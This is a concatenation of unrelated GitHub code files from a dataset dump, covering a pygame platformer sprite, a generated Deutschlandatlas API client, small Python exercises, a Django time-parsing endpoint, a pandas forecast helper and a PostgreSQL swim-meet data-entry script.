Projectile\nimport SpriteBase\n\nvec = pygame.math.Vector2\n\nclass PlayerSprite(SpriteBase.GameSprite):\n UPDATE_FRAME_ON = 100\n\n def __init__(self, start_coord):\n super().__init__(start_coord)\n self.move_speed = Move.PLAYER_MOVE\n self.space_pushed = False\n self.is_dead = False\n self.nerf_dart_image_right = pygame.image.load(Game.NERF_DART_IMAGE).convert()\n self.nerf_dart_image_left = pygame.transform.flip(self.nerf_dart_image_right, True, False)\n self.sprite_sheet = SpriteBase.Spritesheet(Player.ZOEY_SPRITE_SHEET)\n self.load_player_sprites()\n self.image_set = self.stop_image_left\n self.image = 
self.image_set[0]\n self.rect = self.image.get_rect()\n self.direction = Move.STOP\n self.facing = Move.RIGHT\n self.jump_buffer = None\n self.duck = False\n self.run = False\n self.onGround = False\n self.current_frame = 0\n self.last_frame = 0\n self.gun = None\n self.rect.move_ip(self.pos)\n self.collision_rect = self.rect.inflate(Player.PLAYER_X_SHRINK, Player.PLAYER_Y_SHRINK)\n self.jump_sound = pygame.mixer.Sound(Player.PLAYER_JUMP_SOUND)\n self.shoot_sound = pygame.mixer.Sound(Player.PLAYER_SHOOT_SOUND)\n self.shoot_sound.set_volume(100)\n self.bullets = SpriteBase.BulletBaseGroup()\n\n def load_player_sprites(self):\n self.frames_right = [self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 0, 0),\n self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 1, 0),\n self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 2, 0)]\n self.stop_image_right = [self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 3, 0)]\n self.stop_image_left = [pygame.transform.flip(self.stop_image_right[0], True, False)]\n self.image_jump_right = self.sprite_sheet.get_image_row_column(Player.PLAYER_SPRITE_WIDTH, Player.PLAYER_SPRITE_HEIGHT, 4, 0)\n self.image_jump_left = pygame.transform.flip(self.image_jump_right, True, False)\n self.frames_left = []\n for image in self.frames_right:\n self.frames_left.append(pygame.transform.flip(image, True, False))\n\n def get_bullets(self):\n return self.bullets\n\n def draw(self, display):\n display.blit(self.image, self.rect)\n \n if Game.DEBUG:\n collisiont_rect_image = pygame.Surface((self.collision_rect.width, self.collision_rect.height))\n collisiont_rect_image.fill((120,230,20))\n display.blit(collisiont_rect_image, self.collision_rect)\n\n def move(self, direction, stop_movement=False):\n if stop_movement and self.direction == direction:\n self.direction = Move.STOP\n if direction == Move.LEFT:\n self.image_set = self.stop_image_left\n else:\n self.image_set = self.stop_image_right\n elif not stop_movement:\n if not direction == self.direction:\n self.current_frame = 0\n self.direction = direction\n self.facing = direction\n \n def set_duck(self, duck):\n self.duck = duck\n\n def set_run(self, run):\n self.run = run\n \n def jump(self):\n if self.onGround and not self.jump_buffer == None:\n if pygame.time.get_ticks() - self.jump_buffer <= Control.JUMP_FOGIVENESS:\n self.jump_sound.play()\n self.onGround = False\n self.acc.y = Move.PLAYER_JUMP\n self.jump_buffer = None\n if self.facing == Move.LEFT:\n self.image = self.image_jump_left\n else:\n self.image = self.image_jump_right\n\n \"\"\" add a jumper to the buffer with the current time of button press\n This will make jumping more responsive since you can press button slightly before hitting the ground and still\n have jump register \"\"\"\n def add_jump_to_buffer(self):\n self.jump_buffer = pygame.time.get_ticks()\n\n def set_move_speed(self):\n if self.move_speed == Move.PLAYER_MOVE:\n if self.run and self.onGround:\n self.move_speed = Move.PLAYER_RUN\n if self.move_speed == Move.PLAYER_RUN:\n if not self.run and self.onGround:\n self.move_speed = Move.PLAYER_MOVE\n\n def update(self, friction, gravity, floor):\n force = False\n self.set_move_speed()\n if self.direction == Move.LEFT:\n self.acc.x = -self.move_speed\n self.image_set = self.frames_left\n if self.direction == Move.RIGHT:\n self.acc.x = self.move_speed\n self.image_set = 
self.frames_right\n self.jump()\n \n self.acc.x += self.vel.x * friction\n if math.fabs(self.acc.x) <= Move.ZERO_THRESHOLD and self.onGround and self.direction == Move.STOP:\n self.acc.x = 0\n self.vel.x = 0\n \n self.update_position(gravity)\n #print(\"vel = \"+str(self.vel) + \"acc = \"+str(self.acc) + \"pos = \"+str(self.pos))\n\n if self.pos.y > floor:\n self.is_dead = True\n self.acc = vec(0, gravity)\n \n self.animate(force)\n self.onGround = False\n\n def animate(self, force):\n now = pygame.time.get_ticks()\n if (now - self.last_frame >= self.UPDATE_FRAME_ON) and self.onGround or (force):\n self.last_frame = now\n self.current_frame += 1\n if self.current_frame >= len(self.image_set):\n self.current_frame = 0\n self.image = self.image_set[self.current_frame] \n\n def set_position(self, object):\n y_vel = math.ceil(self.vel.y + .5 * self.acc.y)\n #print(\"object top = \" + str(object.rect.top)+' self bottom = ' +str(self.rect.bottom) + \" y_vel = \"+str(y_vel))\n if self.vel.y > 0 and object.rect.top >= self.rect.bottom - y_vel:\n self.vel.y = 0\n if self.rect.bottom - 1 == object.rect.top:\n self.onGround = True\n self.pos.y = object.rect.top - self.rect.height\n\n def kill_enemy(self, enemy, gravity):\n y_vel = math.ceil(self.vel.y + .5 * self.acc.y)\n # print('enemy top: '+str(enemy.rect.top) + ' self bottom: '+str(self.rect.bottom) + ' yvel = '+str(y_vel)\n # +' vel = '+str(self.vel))\n if self.vel.y - gravity > 0 and enemy.get_collision_rect().top >= self.collision_rect.bottom - y_vel:\n self.vel.y = Move.PLAYER_POP\n return True\n else:\n self.is_dead = True\n return False\n \n def set_gun(self, gun):\n self.gun = gun\n \n def get_ammo(self):\n ammo = 0\n if not self.gun == None:\n ammo = self.gun.get_ammo_amount()\n return ammo\n\n def shoot(self):\n if not self.gun == None and self.gun.get_ammo_amount() > 0:\n self.gun.set_ammo_amount(self.gun.get_ammo_amount() - 1)\n self.shoot_sound.play()\n if self.facing == Move.LEFT:\n self.bullets.add(Projectile(-self.gun.get_x_shoot_speed(),\n self.gun.get_y_shoot_speed(), (self.rect.x-self.nerf_dart_image_left.get_rect().width,self.rect.y+self.rect.height/2), self.nerf_dart_image_left))\n if self.facing == Move.RIGHT:\n self.bullets.add(Projectile(self.gun.get_x_shoot_speed(\n ), self.gun.get_y_shoot_speed(), self.rect.midright, self.nerf_dart_image_right))\n\n def add_ammo(self, amount):\n if not self.gun == None:\n self.gun.set_ammo_amount(self.gun.get_ammo_amount() + 1)\n","repo_name":"pojo79/ZoeyGame","sub_path":"PlayerSprite.py","file_name":"PlayerSprite.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72460949605","text":"\"\"\"\n Deutschlandatlas-API\n\n Der [Deutschlandatlas](https://www.deutschlandatlas.bund.de/DE/Home/home_node.html) ist ein Internetangebot, herausgegeben vom Bundesministerium für Wohnen, Stadtentwicklung und Bauwesen. Dort finden sich interaktive Karten zu gleichwertigen Lebensverhältnissen auf Grundlage aktueller verfügbarer Daten. Informationen zu allen [Indikatoren](https://www.deutschlandatlas.bund.de/DE/Service/Downloads/Indikatoren_Deutschlandatlas.html) sowie aktuelle Daten in [tabellarischer Form](https://www.deutschlandatlas.bund.de/DE/Service/Downloads/downloads_node.html) stehen online zum Download bereit. 
# noqa: E501\n\n The version of the OpenAPI document: 1.0.0\n Contact: kontakt@bund.dev\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom deutschland.Deutschlandatlas.api_client import ApiClient\nfrom deutschland.Deutschlandatlas.api_client import Endpoint as _Endpoint\nfrom deutschland.Deutschlandatlas.model_utils import ( # noqa: F401\n check_allowed_values,\n check_validations,\n date,\n datetime,\n file_type,\n none_type,\n validate_and_convert_types,\n)\n\n\nclass DefaultApi(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n self.query_endpoint = _Endpoint(\n settings={\n \"response_type\": (\n {\n str: (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n none_type,\n )\n },\n ),\n \"auth\": [],\n \"endpoint_path\": \"/{table}/MapServer/0/query\",\n \"operation_id\": \"query\",\n \"http_method\": \"GET\",\n \"servers\": None,\n },\n params_map={\n \"all\": [\n \"table\",\n \"where\",\n \"f\",\n \"out_fields\",\n \"return_geometry\",\n \"spatial_rel\",\n ],\n \"required\": [\n \"table\",\n \"where\",\n \"f\",\n ],\n \"nullable\": [],\n \"enum\": [],\n \"validation\": [],\n },\n root_map={\n \"validations\": {},\n \"allowed_values\": {},\n \"openapi_types\": {\n \"table\": (str,),\n \"where\": (str,),\n \"f\": (str,),\n \"out_fields\": (str,),\n \"return_geometry\": (bool,),\n \"spatial_rel\": (str,),\n },\n \"attribute_map\": {\n \"table\": \"table\",\n \"where\": \"where\",\n \"f\": \"f\",\n \"out_fields\": \"outFields\",\n \"return_geometry\": \"returnGeometry\",\n \"spatial_rel\": \"spatialRel\",\n },\n \"location_map\": {\n \"table\": \"path\",\n \"where\": \"query\",\n \"f\": \"query\",\n \"out_fields\": \"query\",\n \"return_geometry\": \"query\",\n \"spatial_rel\": \"query\",\n },\n \"collection_format_map\": {},\n },\n headers_map={\n \"accept\": [\"application/json\"],\n \"content_type\": [],\n },\n api_client=api_client,\n )\n\n def query(self, f, table=\"p_apo_f_ZA2022\", where=\"1%3D1\", **kwargs):\n \"\"\"query # noqa: E501\n\n Im JSON-Format lassen sich aktuelle und historische Daten zu ausgewählten Indikatoren über GET-requests folgender Machart erhalten # noqa: E501\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n\n >>> thread = api.query(f, table=\"p_apo_f_ZA2022\", where=\"1%3D1\", async_req=True)\n >>> result = thread.get()\n\n Args:\n f (str): Output-Format (z.B. 'json' oder 'html').\n table (str): Angaben zu allen online vorliegenden Tabellen finden sich [hier](https://www.karto365.de/portal/sharing/rest/search?q=deutschlandatlas&f=json&num=100&start=1) und [hier](https://www.karto365.de/portal/sharing/rest/search?q=deutschlandatlas&f=json&num=100&start=101) . defaults to \"p_apo_f_ZA2022\", must be one of [\"p_apo_f_ZA2022\"]\n where (str): Spezifikation einer gewünschten Teilmenge der Daten (z.B.'1=1').. defaults to \"1%3D1\", must be one of [\"1%3D1\"]\n\n Keyword Args:\n out_fields (str): Auszugebende Variablen/fields (z.B. '*').. [optional]\n return_geometry (bool): Boolsche Angabe, ob Angaben zur Geometrie gesendet werden sollen (z.B. 'false').. [optional]\n spatial_rel (str): spational relation (z.B. 'esriSpatialRelIntersects').. 
[optional]\n _return_http_data_only (bool): response data without head status\n code and headers. Default is True.\n _preload_content (bool): if False, the urllib3.HTTPResponse object\n will be returned without reading/decoding response data.\n Default is True.\n _request_timeout (int/float/tuple): timeout setting for this request. If\n one number provided, it will be total request timeout. It can also\n be a pair (tuple) of (connection, read) timeouts.\n Default is None.\n _check_input_type (bool): specifies if type checking\n should be done one the data sent to the server.\n Default is True.\n _check_return_type (bool): specifies if type checking\n should be done one the data received from the server.\n Default is True.\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _content_type (str/None): force body content-type.\n Default is None and content-type will be predicted by allowed\n content-types and body.\n _host_index (int/None): specifies the index of the server\n that we want to use.\n Default is read from the configuration.\n _request_auths (list): set to override the auth_settings for an a single\n request; this effectively ignores the authentication\n in the spec for a single request.\n Default is None\n async_req (bool): execute request asynchronously\n\n Returns:\n {str: (bool, date, datetime, dict, float, int, list, str, none_type)}\n If the method is called asynchronously, returns the request\n thread.\n \"\"\"\n kwargs[\"async_req\"] = kwargs.get(\"async_req\", False)\n kwargs[\"_return_http_data_only\"] = kwargs.get(\"_return_http_data_only\", True)\n kwargs[\"_preload_content\"] = kwargs.get(\"_preload_content\", True)\n kwargs[\"_request_timeout\"] = kwargs.get(\"_request_timeout\", None)\n kwargs[\"_check_input_type\"] = kwargs.get(\"_check_input_type\", True)\n kwargs[\"_check_return_type\"] = kwargs.get(\"_check_return_type\", True)\n kwargs[\"_spec_property_naming\"] = kwargs.get(\"_spec_property_naming\", False)\n kwargs[\"_content_type\"] = kwargs.get(\"_content_type\")\n kwargs[\"_host_index\"] = kwargs.get(\"_host_index\")\n kwargs[\"_request_auths\"] = kwargs.get(\"_request_auths\", None)\n kwargs[\"table\"] = table\n kwargs[\"where\"] = where\n kwargs[\"f\"] = f\n return self.query_endpoint.call_with_http_info(**kwargs)\n","repo_name":"AndreasFischer1985/deutschlandatlas-api","sub_path":"python-client/deutschland/Deutschlandatlas/api/default_api.py","file_name":"default_api.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73342146085","text":"class Persona(object):\n\n def __init__(self, dni, nombre, apellido, anioNacimiento, sexo):\n # Constructor de clase Persona\n self.dni = dni\n self.nombre = nombre\n self.apellido = apellido\n self.sexo = str(sexo)\n self.anioNacimiento = int(anioNacimiento)\n\n def getGenero(self, sexo):\n genero = ('Masculino','Femenino')\n if sexo.upper() == \"M\":\n return genero[0]\n elif sexo.upper() == \"F\":\n return genero[1]\n else:\n return \"Desconocido\"\n\n def getGeneracion(self, anioNacimiento):\n generacion = ''\n if(anioNacimiento >= 1930 and anioNacimiento <= 1948):\n generacion = 'Silent Generation'\n elif(anioNacimiento >= 1949 and anioNacimiento <= 1968):\n generacion = 'Baby Boom'\n elif(anioNacimiento >= 1969 and anioNacimiento 
<= 1980):\n generacion = \"Generacion X\"\n elif(anioNacimiento >= 1981 and anioNacimiento <= 1993):\n generacion = \"Generacion Y: Millenials\"\n elif(anioNacimiento >= 1994 and anioNacimiento <= 2010):\n generacion = \"Generacion Z\"\n else:\n generacion = 'Geneacion desconocida'\n return generacion\n\nclass estudiante(Persona):\n # Clase que representa a un estudiante\n\n def __init__(self, nombre, apellido, dni, anioNacimiento, sexo, carrera, lugarDeEstudio):\n\n # Invoco al constructor de clase Persona\n Persona.__init__(self, dni, nombre, apellido, anioNacimiento, sexo)\n\n # Nuevos atributos\n self.carrera = carrera\n self.lugarDeEstudio = lugarDeEstudio\n\n def mostrarDatos(self):\n return \"Estudiante: \" + self.nombre + \" \" + self.apellido + \"\\nCarrera: \" + self.carrera + \"\\nLugar De Estudio: \" + self.lugarDeEstudio +\".\"\n\n\ndef cargarEstudiante():\n print(\"Carga de datos del estudiante\")\n nombre = input(\"Nombre: \")\n apellido = input(\"Apellido: \")\n sexo = input(\"Sexo: \")\n dni = input(\"DNI: \")\n anioNacimiento = int(input(\"Año de nacimiento: \"))\n carrera = input(\"Carrera: \")\n lugarDeEstudio = input(\"Lugar de estudio: \") \n print(\"-----------------------------\")\n return estudiante(nombre, apellido, dni, anioNacimiento, sexo, carrera, lugarDeEstudio)\n\ndef ejecutarOpciones(estudiante2): \n opcion = int(input(\"Que desea realizar?\\n1- Ver a que generacion pertenece el estudiante.\\n2- Ver los datos del estudiante.\\n\"))\n while opcion == 1 or opcion == 2 or opcion == 3:\n if (opcion == 1):\n print(estudiante2.getGeneracion(estudiante2.anioNacimiento))\n elif (opcion == 2):\n print(estudiante2.mostrarDatos())\n elif (opcion == 3):\n cargarEstudiante()\n print(\"-----------------------------\")\n opcion = int(input(\"Desea realizar algo mas?\\n1- Ver a que generacion pertenece el estudiante.\\n2- Ver los datos del estudiante.\\n3- Cargar otro estudiante.\\n0- Salir\\n\"))\n\nestudiante2 = cargarEstudiante()\nejecutarOpciones(estudiante2)\n\n# persona1 = Persona(12345678, \"Leonardo\", \"Caballero\", 1965, \"m\")\n\n# print(persona1.getGenero(persona1.sexo))\n\n# estudiante1 = estudiante(\"11234567\", \"Jen\", \"Paz\", 1968, \"M\", \"compu\", \"ispc\")\n\n# print(estudiante1.getGeneracion(estudiante1.anioNacimiento))\n\n# print(estudiante1.mostrarDatos())","repo_name":"EricERodriguez/IEFI-Programacion","sub_path":"POO.py","file_name":"POO.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73512539045","text":"n=int(input(\"Enter the number \"))\r\nsum=0\r\nmul=1\r\nwhile n>0:\r\n dig=n%10\r\n sum=sum+dig\r\n mul=mul*dig\r\n n=n//10\r\nif sum==mul:\r\n print(\"Spy number\")\r\nelse:\r\n print(\"Not a spy number\")","repo_name":"sajilasharafu/python","sub_path":"spy.py","file_name":"spy.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10704452790","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.left = self.right = None\n\n\ndef build(arr):\n if len(arr) == 0:\n return None\n\n if len(arr) == 1:\n return Node(arr[0])\n\n mid = (len(arr))//2\n node = Node(arr[mid])\n node.left = build(arr[:mid])\n node.right = build(arr[mid+1:])\n\n return node\n\n\ndef closest_value(root, target):\n a = root.value\n kid = root.left if target < a else root.right\n if not kid:\n return a\n b = closest_value(kid, target)\n return 
min((a, b), key=lambda x: abs(target-x))\n\n\nif __name__ == \"__main__\":\n arr = [1, 13, 17, 20, 24, 35, 46]\n node = build(arr)\n\n assert closest_value(node, 23) == 24\n","repo_name":"ne7ermore/playground","sub_path":"python/tree/bst_closest_value.py","file_name":"bst_closest_value.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"6998426338","text":"\"\"\"\n@description: Django 服务入口文件,提供 get_result 接口返回查询图\n@author: Cui Rui long\n@email: xiaocuikindle@163.com\n@time: 2019-11-08\n@version: 0.0.1\n\"\"\"\nimport timeit\nimport json\nimport logging\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom time_server.source.time_module.time_normalizer import TimeNormalizer\n\n# 定义整体服务用到的日志文件\nlogger = logging.getLogger(\"server_log\")\n\n\n# 在这里定义在整个程序都会用到的类的实例\ntime_normalizer = TimeNormalizer()\n\n\n# 服务的接口文档\n@csrf_exempt\ndef get_result(request):\n \"\"\"\n input: 接收客户端发送的POST请求:{\"sentence\": \"raw_sentence\"}\n output: 服务器返回JSON格式的数据,返回的数据格式如下:\n :param request: 用户输入的查询句子\n :return\n \"\"\"\n\n if request.method != 'POST':\n logger.error(\"仅支持post访问\")\n return JsonResponse({\"result\": {}, \"msg\": \"仅支持post访问\"}, json_dumps_params={'ensure_ascii': False})\n\n request_data = json.loads(request.body)\n sentence = request_data['sentence']\n\n start_time = timeit.default_timer()\n\n # 时间归一化逻辑代码\n result = time_normalizer.parse(sentence)\n\n end_time = timeit.default_timer()\n logger.info(\"Full time consume: {0} S.\\n\".format(end_time - start_time))\n # 返回JSON格式数据,将 result_ner 替换成需要返回的JSON数据\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})","repo_name":"xiaocuigit/time_x_machine","sub_path":"time_server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24837040381","text":"import mysql.connector\nimport pandas as pd\nimport datetime\nimport calendar\n\n# from secreto import *\nfrom BBDD.secreto import *\n\nclass Pronostico():\n def __init__(self):\n self.mydb = mysql.connector.connect(host=host, user=user, password=password, database=database)\n\n def datosPedidos(self, desde, hasta):\n\n # hasta = datetime.datetime.strptime(hasta, \"%Y-%m-%d\")\n # print(hasta)\n # hasta = hasta + datetime.timedelta(days=-1)\n # print(hasta)\n\n mycursor =self.mydb.cursor()\n sql = \"SELECT fecha_ped, SUM(cantidad_ped) FROM pedido WHERE fecha_ped BETWEEN %s AND %s GROUP BY fecha_ped\"\n mycursor.execute(sql,(desde, hasta))\n myresult = mycursor.fetchall()\n \n df = pd.DataFrame(myresult, columns=[\"fecha_ped\",\"cantidad_ped\"])\n df[\"fecha_ped\"] = pd.to_datetime(df[\"fecha_ped\"])\n df.set_index(\"fecha_ped\", inplace=True)\n ultima_fecha = max(df.index)\n # ultimo_dia_mes = calendar.monthrange(ultima_fecha.year, ultima_fecha.month)[1]\n inicio = min(df.index)\n # fin = ultima_fecha.replace(day=ultimo_dia_mes)\n index = pd.date_range(start=inicio, end=ultima_fecha, freq=\"D\")\n df = df.reindex(index)\n df = df.fillna(0)\n df[\"cantidad_ped\"] = df[\"cantidad_ped\"].astype(float)\n return df\n","repo_name":"sandracarmona1/SAPIM","sub_path":"BBDD/pronosticos.py","file_name":"pronosticos.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36084632463","text":"input = 20\n\nmemoize = [0]* 
3\nmemoize[0] = 0\nmemoize[1] = 1\n\ndef helper(n):\n\n for i in range(2,n+1):\n memoize[i%3] = memoize[(i-1)%3] + memoize[(i-2)%3]\n\n\nhelper(input)\nprint(memoize)\nprint(len(memoize))\n\n\n\n","repo_name":"ajaygc95/DS-ALGO","sub_path":"Algorithms/Dynamic Programming/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11077146821","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 18 15:33:04 2017\n\n@author: zhenshan\n\"\"\"\nimport psycopg2\n\ndef ReadFile(filename, conn_str):\n #not sure if this is ok, or I have to maintain a list in sql\n #for now, do this. I can switch to sql later.\n # Connect to an existing database\n\n\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n is_valid=False\n\n try:\n myfile = open(filename, \"r\")\n except IOError:\n print(\"Could not open file \")\n return;\n\n for line in myfile.readlines():\n\n if line.startswith(\"*\"):\n vals=line[:-1].split(\",\");\n line=[x for x in vals if x]\n if (valid_names.count(line[0][1:])>0):\n is_valid=True\n table_name=line[0][1:]\n else:\n is_valid=False\n else:\n #check that the function name is valid first\n #if we don't have a real table name, don't bother\n if(is_valid):\n if((table_name=='Stroke')or (table_name=='Distance')or (table_name=='Leg')) :\n vals=line[:-1].split(\",\");\n vals=[x for x in vals if x]\n #vals=line[:-1];\n callInsert(table_name, vals[0], conn_str)\n else:\n vals=line[:-1].split(\",\");\n vals=[x for x in vals if x]\n callInsert(table_name, vals, conn_str)\n\ndef ReadFileMenu(conn_str):\n selection= input(\"Please Input the file name\")\n ReadFile(selection, conn_str)\n\ndef callInsert(table_name, arg_list, conn_str):\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n arg_count =[3, 4, 3, 3,1 , 1, 3, 6, 1, 3]\n\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n\n # Open a cursor to perform database operations\n cur = conn.cursor()\n if (table_name==\"Org\"):\n if(len(arg_list)!=3):\n print(\"Org requires 3 arguments:\")\n else:\n cur.callproc('InsertOrg', (arg_list[0], arg_list[1], arg_list[2]))\n\n if (table_name==\"Meet\"):\n if(len(arg_list)!=4):\n print(\"Meet requires 4 arguments:\")\n else:\n cur.callproc('InsertMeet', (arg_list[0], arg_list[1], arg_list[2], arg_list[3]))\n\n if (table_name==\"Participant\"):\n if(len(arg_list)!=4):\n print(\"Participant requires 4 arguments:\")\n else:\n cur.callproc('InsertParticipant', (arg_list[0], arg_list[1], arg_list[2], arg_list[3]))\n\n if (table_name==\"Event\"):\n if(len(arg_list)!=3):\n print(\"Event requires 3 arguments:\")\n print(\"X\", arg_list, \"X\")\n else:\n cur.callproc('InsertEvent', (arg_list[0], arg_list[1], arg_list[2]))\n\n\n if (table_name==\"Stroke\"):\n #if(len(arg_list)!=1):\n #print(\"Stroke requires 1 arguments:\")\n #else:\n cur.callproc('InsertStroke', (arg_list,))\n\n if (table_name==\"Distance\"):\n #if(len(arg_list)!=1):\n # print(\"Distance requires 1 arguments:\")\n #else:\n\n cur.callproc('InsertDistance', (int(arg_list),))\n\n if (table_name==\"Heat\"):\n if(len(arg_list)!=3):\n print(\"Heat requires 3 arguments:\")\n else:\n cur.callproc('InsertHeat', (arg_list[0], arg_list[1], arg_list[2]))\n\n if 
(table_name==\"Swim\"):\n if(len(arg_list)!=6):\n print(\"Swim requires 6 arguments:\")\n else:\n cur.callproc('InsertSwim', (arg_list[0], arg_list[1], arg_list[2], arg_list[3], int(arg_list[4]), float(arg_list[5])))\n\n if (table_name==\"Leg\"):\n #if(len(arg_list)!=1):\n #print(\"Leg requires 1 arguments:\")\n #else:\n cur.callproc('InsertLeg', (int(arg_list),))\n\n if (table_name==\"StrokeOf\"):\n if(len(arg_list)!=3):\n print(\"StrokeOf requires 3 arguments:\")\n else:\n cur.callproc('InsertStrokeOf', (arg_list[0], arg_list[1], arg_list[2]))\n\n\n conn.commit()\n\n # Close communication with the database\n cur.close()\n conn.close()\n\ndef AddRowMenu(conn_str):\n valid_names =[\"Org\", \"Meet\", \"Participant\", \"Event\", \"Stroke\", \"Distance\", \"Heat\", \"Swim\", \"Leg\", \"StrokeOf\"]\n name_not_valid=True\n while(name_not_valid):\n selection= input(\"What Table Do You Want to Add A Row to?\\n(Org, Meet, Participant, Event, Stroke, Distance, Heat, Swim, Leg, StrokeOf)\\n\")\n print(\"read in:\", selection)\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n #get the available tables from the database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n querry=\"SELECT reminder FROM Remind WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n # Close communication with the database\n cur.close()\n conn.close()\n #should only be 1 row, but I'm iterating to get at it.\n print(\"Insert the fields separated by commas [,] . Use NULL in place of a field to omit it.\")\n for r in rows:\n print (r[0])\n selection=input()\n vals=selection[:-1].split(\",\");\n vals=[x for x in vals if x]\n if((table_name=='Stroke')or (table_name=='Distance')or (table_name=='Leg')) :\n #vals=line[:-1];\n callInsert(table_name, vals[0], conn_str)\n else:\n callInsert(table_name, vals, conn_str)\n \ndef ChangeRowMenu(conn_str):\n valid_names =[\"Org\", \"Participant\", \"Event\"]\n name_not_valid=True\n while(name_not_valid):\n selection= input(\"What Table Do You Want to Change?\\n(Org, Participant, Event)\\n\")\n #print(\"read in:\", selection)\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n #get the available tables from the database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n # querry=\"SELECT reminder FROM RemindPrimaryKey WHERE TableName='\"+ table_name+\"'\"\n cur = conn.cursor()\n # cur.execute(querry)\n cur.callproc('GetPrimaryKey', (table_name, ))\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n\n for r in rows:\n primary_key= (r[0])\n print(\"Update will be based on primary_key:\", primary_key)\n #should only be 1 row, but I'm iterating to get at it.\n print(\"Enter primary key:\")\n selection=input()\n #make sure primary key exists\n #MAKE SURE PRIMARY KEY IS VALID!!!!!\n\n cur = conn.cursor()\n cur.callproc('GetNotPrimaryKey', (table_name, ))\n # Make the changes to the database persistent\n rows = cur.fetchall()\n conn.commit()\n # Close communication with the database\n cur.close()\n conn.close()\n #should only be 1 row, but I'm iterating to get at 
it.\n print(\"Insert the fields separated by commas [,] . Use NULL in place of a field to omit it.\")\n for r in rows:\n print (r[0])\n\n selection=input()\n #arg_list=selection.split(\",\")\n vals=selection[:-1].split(\",\");\n vals=[x for x in vals if x]\n vals.insert(0, table_name )\n callInsert(table_name, vals, conn_str)\n #callInsert(table_name, arg_list)\n\ndef UpdateRowMenu(conn_str):\n valid_names =[\"Org\", \"Participant\", \"Event\"]\n selection= input(\"What Table Do You Want to Update\\n(Org, Participant, Event)\\n\")\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n UpdateRow(table_name, conn_str)\n else:\n print (\"Table not valid:\")\n\ndef UpdateRow(table_name, conn_str):\n #get the available tables from the database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n querry=\"SELECT reminder FROM RemindPrimaryKey WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n rows = cur.fetchall()\n # Make the changes to the database persistent\n conn.commit()\n #should only be 1 row, but I'm iterating to get at it.\n print(\"Enter primary key:\")\n for r in rows:\n print (r[0])\n selection=input()\n #now ask for values to update\n querry=\"SELECT reminder FROM RemindNotPK WHERE tablename='\"+ table_name+\"'\"\n #querry=\"SELECT reminder FROM Remind WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n rows = cur.fetchall()\n # Make the changes to the database persistent\n conn.commit()\n\n print(\"Enter a Field_Name='New_Value' . Separate multiple Fields by commas. Valid fields:\")\n for r in rows:\n print (r[0])\n selection=input()\n arg_list=selection.split(\", \")\n print(\"arg list:\", arg_list)\n #callInsert(table_name, arg_list)\n # Close communication with the database\n 